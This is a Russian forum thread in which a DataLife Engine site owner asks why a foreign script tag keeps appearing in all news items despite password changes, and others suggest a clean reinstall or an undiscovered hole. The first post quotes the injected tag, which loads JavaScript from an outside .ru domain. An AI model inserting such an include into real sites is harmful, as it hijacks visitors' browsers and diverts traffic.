Всем привет. Постоянно появляются сторонние скрипты в разделе "полное описание" в редактировании новости. Вот скрипт <script type="text/javascript" src="http://8ee.og0go.ru/js.js?p=&id=uc8...&be&mt&az&t2&bm&kz&ua&pl&ger&bra&ya&ssl&sid=0"></script> Добавляется сразу ко всем новостям. Все пароли изменял к ftp и доступ к акаунту Dle, так же менял пароль от хостинга. Весь сайт перешерстил на шелы (в этом я не про) но ничего не нашел. Каким образом можно так проставлять, кто знает и подскажет где рыть?
ставь на другой хост чистый движок на любой домен в своем файле хост прописывай 00.99.99.99. www.site.ru site.ru и перекидывай туда базу и там ставь заново все модули и делай там правки все заново. потом просто меняешь пароли удаляешь сайт и закачиваешь новый. а так искать много времени уйдет,лучше все заново сделать
Шаб покупной??? Вот ссыл с самого файла Chart.js | Open source HTML5 Charts for your website Первое что перевел переводчик яндекса Простой, но гибкий JavaScript для построения графиков для дизайнеров и разработчиков
Да шаб я вылизывал, удалил три ссылки. Это началось может мес назад, а сайт три года работал до этого без сливов на wap
Если все было удалено и сменены все пароли, то вывод один где-то завелась дырочка в сайте. Иного вывода у меня нет, либо это-то файл подцепляется еще каким нибудь файлом.